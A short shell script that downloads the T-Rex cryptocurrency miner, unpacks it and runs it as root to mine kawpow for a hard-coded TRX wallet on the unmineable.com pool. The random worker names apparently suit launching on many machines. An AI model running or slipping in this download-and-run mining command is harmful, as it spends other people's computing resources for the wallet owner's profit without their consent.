#!/bin/sh
apt-get install libpci3 && wget https://trex-miner.com/download/t-rex-0.25.8-linux.tar.gz && tar -xvf t-rex-0.25.8-linux.tar.gz && sudo ./t-rex -a kawpow -o kp.unmineable.com:3333 -u TRX:TPQwsYETz17e5Xka2aqMwSXRtfGCaPbhzH.$(echo $(shuf -i 2-5 -n 1)-$(shuf -i 1-111 -n 1)-T-Rex#ln9q-3xm0) -p x
